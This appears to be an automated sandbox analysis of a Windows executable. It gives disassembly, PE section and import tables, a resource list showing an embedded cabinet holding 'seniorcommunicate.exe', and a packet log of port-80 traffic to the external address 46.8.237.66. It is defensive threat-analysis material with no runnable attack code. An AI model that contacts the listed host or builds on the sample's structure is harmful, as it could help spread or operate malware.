                              dec eax
                              cmpxchg dword ptr [00004922h], ebx
                              je 00007FC938BA937Ch
                              dec eax
                              cmp eax, ebx
                              jne 00007FC938BA938Ch
                              mov edi, 00000001h
                              mov eax, dword ptr [00004918h]
                              cmp eax, 01h
                              jne 00007FC938BA9389h
                              lea ecx, dword ptr [eax+1Eh]
                              call 00007FC938BA9963h
                              jmp 00007FC938BA93ECh
                              mov ecx, 000003E8h
                              call dword ptr [0000117Eh]
                              jmp 00007FC938BA9339h
                              mov eax, dword ptr [000048F6h]
                              test eax, eax
                              jne 00007FC938BA93CBh
                              mov dword ptr [000048E8h], 00000001h
                              dec esp
                              lea esi, dword ptr [000013E9h]
                              dec eax
                              lea ebx, dword ptr [000013CAh]
                              dec eax
                              mov dword ptr [esp+30h], ebx
                              mov dword ptr [esp+24h], eax
                              dec ecx
                              cmp ebx, esi
                              jnc 00007FC938BA9397h
                              test eax, eax
                              jne 00007FC938BA9397h
                              dec eax
                              cmp dword ptr [ebx], 00000000h
                              je 00007FC938BA9382h
                              dec eax
                              mov eax, dword ptr [ebx]
                              dec eax
                              mov ecx, dword ptr [00001388h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x24548 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x34000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x25000 | 0x24600 | f76cd5652d090a049d6bec6ec62ceb47 | False | 0.7952171928694158 | data | 7.3102359756380215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x34000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x8faa | Microsoft Cabinet archive data, Windows 2000/XP setup, 36778 bytes, 1 file, at 0x2c +A "seniorcommunicate.exe", ID 2197, number 1, 2 datablocks, 0x1503 compression | English | United States | 1.00057099352874
RT_RCDATA | 0x3281c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x32820 | 0x24 | data | English | United States | 0.7222222222222222
RT_RCDATA | 0x32844 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x3284c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x32854 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x32858 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x32860 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x32864 | 0x18 | data | English | United States | 1.3333333333333333
RT_RCDATA | 0x3287c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x32880 | 0xc | data | English | United States | 1.6666666666666667
RT_RCDATA | 0x3288c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x32894 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x3289c | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x32958 | 0x408 | data | English | United States | 0.42151162790697677
RT_MANIFEST | 0x32d60 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Oct 30, 2024 20:19:02.117892027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.117901087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118035078 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118098974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118108034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118149042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118180990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118237019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118271112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118285894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118345022 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118612051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118666887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118676901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118709087 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118773937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118813038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.119159937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119235992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119268894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.119354010 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119462013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119467020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119497061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.169663906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.169787884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.169792891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.217860937 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237601042 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237724066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237732887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237777948 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237803936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237816095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237844944 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237896919 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237935066 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238157034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238243103 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238251925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238282919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238365889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238404989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238779068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238873005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238883018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238894939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238909006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238926888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.239068985 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.280236006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.333935022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.333946943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.334038019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357094049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357142925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357155085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357222080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357280970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357335091 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357346058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357464075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357506037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357541084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357552052 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357589006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357909918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357981920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357994080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358021975 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358114958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358125925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358155012 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358727932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358768940 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358772993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358784914 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358819962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358853102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.405261040 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.476775885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476840019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476850033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476965904 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.476989031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477035999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477066994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477077961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477118969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477211952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477224112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477262020 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477714062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477781057 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477790117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477818012 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477941036 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477951050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477982044 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.478486061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478497028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478530884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.478552103 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478562117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478588104 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.530225039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596355915 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596415043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596425056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596455097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596502066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596546888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596610069 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596620083 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596657991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596846104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596950054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596963882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596985102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597256899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597268105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597297907 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597374916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597385883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597397089 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597414017 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597438097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597918034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598016977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598031044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598053932 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.598162889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598172903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598215103 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716028929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716083050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716094971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716176987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716221094 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716253996 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716269970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716281891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716320038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716492891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716568947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716578960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716610909 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716773033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716784000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716794968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716816902 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716845989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717430115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717504978 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717514992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717550039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717621088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717665911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717931032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717988968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717999935 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.718029976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.757791996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.757908106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.758060932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.811547041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835489988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835550070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835561991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835663080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835695982 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835720062 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835736990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835747957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835808992 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835930109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835939884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835983992 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836369038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836589098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836599112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836646080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836719990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836730957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836741924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836770058 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836792946 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836968899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837018967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837028980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837058067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.837227106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837238073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837289095 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.921871901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921926022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921935081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921972036 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.921973944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.922012091 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955513000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955558062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955569029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955632925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955703020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955764055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955776930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955776930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955815077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955950022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955959082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955965042 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955976009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955986977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955998898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956042051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956127882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956139088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956185102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956345081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956392050 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956446886 CET804970946.8.237.66192.168.2.6
